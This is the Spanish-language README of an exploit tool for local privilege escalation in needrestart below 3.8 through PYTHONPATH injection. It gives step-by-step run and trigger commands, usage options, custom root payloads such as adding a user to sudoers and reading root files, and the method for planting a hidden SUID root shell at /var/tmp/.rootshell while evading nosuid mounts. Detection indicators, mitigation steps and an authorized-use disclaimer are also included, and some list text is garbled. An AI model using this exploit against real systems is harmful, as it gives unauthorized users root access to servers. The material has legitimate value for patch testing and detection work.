
needrestart < 3.8 Escalada de Privilegios Local mediante inyección de PYTHONPATH
Exploit de escalada de privilegios local que apunta a needrestart < 3.8 en sistemas Ubuntu/Debian mediante inyección de PYTHONPATH.
needrestart es una utilidad comúnmente instalada en servidores Ubuntu/Debian que verifica qué servicios necesitan reiniciarse después de las actualizaciones de bibliotecas. Se ejecuta como root y normalmente se activa automáticamente después de operaciones apt o se invoca directamente mediante sudo.
Al verificar procesos de Python, needrestart vuelve a invocar el intérprete de Python mientras hereda el entorno completo del proceso de /proc/<pid>/environ, incluido PYTHONPATH. Un usuario local sin privilegios puede explotar esto:
PYTHONPATH en un directorio que contenga un paquete malicioso importlibimportlib/__init__.py del atacante como root| Paquete | Vulnerable | Corregido |
|---|---|---|
| needrestart | < 3.8 | >= 3.8 |
Confirmado en:
needrestart 3.5-5ubuntu2.4needrestart 3.6-7ubuntu4chmod +x exploit.sh
./exploit.sh
Luego active needrestart desde otra terminal:
# If you have direct sudo access to needrestart:
sudo /usr/sbin/needrestart
# Or trigger it via apt (needrestart runs as a post-apt hook):
sudo apt update && sudo apt install --reinstall coreutils
Una vez que needrestart se activa, el exploit crea un shell SUID en /var/tmp/.rootshell y te lleva a un shell root automáticamente.
Si la ejecución automática no funciona, toma el shell manualmente:
/var/tmp/.rootshell -p
Usage: ./exploit.sh [OPTIONS]
Options:
-c <command> Custom shell command to run as root (default: copy suid shell)
-w <seconds> Max wait time in seconds (default: 300)
-t Trigger mode: attempt to trigger needrestart via apt
-n No cleanup: keep payload directory after exploitation
-h Show this help message
# Default — creates a SUID /bin/bash copy at /var/tmp/.rootshell
./exploit.sh
# Auto-trigger needrestart via apt (requires sudo apt access)
./exploit.sh -t
# Custom payload: add current user to sudoers
./exploit.sh -c 'usermod -aG sudo targetuser'
# Custom payload: read a restricted file
./exploit.sh -c 'cat /root/flag.txt > /tmp/flag.txt && chmod 644 /tmp/flag.txt'
# Extended wait (10 minutes)
./exploit.sh -w 600
┌───────────────────────────────────────────────────────────────┐
│ 1. Creates /tmp/.nr_XXXX/importlib/__init__.py with payload │
│ that runs os.system() to copy /bin/bash as SUID binary │
├───────────────────────────────────────────────────────────────┤
│ 2. Spawns a long-running Python process with │
│ PYTHONPATH=/tmp/.nr_XXXX exported in its environment │
├───────────────────────────────────────────────────────────────┤
│ 3. needrestart runs (via sudo or apt hook), scans │
│ /proc/*/environ, finds the Python process │
├───────────────────────────────────────────────────────────────┤
│ 4. needrestart re-invokes python3 AS ROOT inheriting the │
│ attacker's PYTHONPATH → loads malicious importlib │
├───────────────────────────────────────────────────────────────┤
│ 5. Payload executes as root: cp /bin/bash + chmod 4755 │
│ → attacker runs /var/tmp/.rootshell -p → root shell │
└───────────────────────────────────────────────────────────────┘
/var/tmp/ en lugar de /tmp/ porque /tmp suele montarse con nosuid, lo que elimina silenciosamente el bit SUID.importlib/__init__.py malicioso restaura el importlib real después de la ejecución del payload limpiando sys.path y sys.modules, para que needrestart no falle visiblemente..py real (no un one-liner con -c) para una mejor compatibilidad con el escaneo de intérpretes de needrestart.Indicadores de que este exploit ha sido utilizado:
/var/tmp/ o /tmp/PYTHONPATH que apuntan a directorios temporales/tmp/.nr_* que contienen un subdirectorio importlib/# Update needrestart to the patched version
sudo apt update && sudo apt install needrestart
# Or disable interpreter scanning entirely
echo "\$nrconf{interpscan} = 0;" | sudo tee /etc/needrestart/conf.d/no-interp.conf
Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. Úsela solo en sistemas que posea o para los que tenga permiso explícito por escrito para realizar pruebas. El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el mal uso.
MIT